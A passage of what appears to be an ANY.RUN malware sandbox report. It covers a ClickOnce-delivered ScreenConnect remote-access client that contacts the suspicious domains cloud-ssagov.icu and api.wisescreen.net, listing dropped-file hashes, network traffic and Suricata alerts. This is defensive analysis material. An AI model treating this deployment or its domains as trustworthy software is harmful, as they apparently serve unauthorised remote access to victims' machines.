(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
XGEK87JJV0VR0HRQ93OKQY7R
(PID) Process:(3856) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
16
Suspicious files
32
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
3856dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:A2914C69101502A2CEE7E6A7C4C9E8B9
SHA256:EC58E4DD00077E9B0BFF2DB2D69963EAF796E998BD50597CDA38EF11DBB90762
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:AFA97CAF20F3608799E670E9D6253247
SHA256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsFileManager.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsBackstageShell.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.Client.dllexecutable
MD5:3724F06F3422F4E42B41E23ACB39B152
SHA256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsClient.exe:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.ClientService.dllexecutable
MD5:5DB908C12D6E768081BCED0E165E36F8
SHA256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsClient.exeexecutable
MD5:1778204A8C3BC2B8E5E4194EDBAF7135
SHA256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.Core.dllexecutable
MD5:14E7489FFEBBB5A2EA500F796D881AD9
SHA256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
43
DNS requests
30
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
4932
svchost.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4932
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
848
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
1588
WerFault.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1588
WerFault.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2480
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4932
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3856
dfsvc.exe
185.49.126.73:443
cloud-ssagov.icu
GCI Network Solutions Limited
GB
unknown
4
System
192.168.100.255:138
whitelisted
3856
dfsvc.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4932
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4932
svchost.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4932
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.142
whitelisted
cloud-ssagov.icu
  • 185.49.126.73
unknown
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 2.16.164.9
  • 2.16.164.49
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
www.bing.com
  • 2.23.209.133
  • 2.23.209.130
  • 104.126.37.162
  • 104.126.37.160
  • 104.126.37.186
  • 104.126.37.131
  • 104.126.37.176
  • 104.126.37.130
  • 104.126.37.178
  • 104.126.37.171
  • 104.126.37.137
whitelisted
login.live.com
  • 20.190.159.23
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.71
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
api.wisescreen.net
  • 185.49.126.73
unknown

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
3856
dfsvc.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.icu) in TLS SNI
3856
dfsvc.exe
Misc activity
ET INFO Observed ZeroSSL SSL/TLS Certificate
3856
dfsvc.exe
Potentially Bad Traffic
ET INFO Observed ZeroSSL Certificate for Suspicious TLD (.icu)
6644
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
Potentially Bad Traffic
ET INFO Dotted Quad Host VBS Request
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/Bin/Support.Client.exe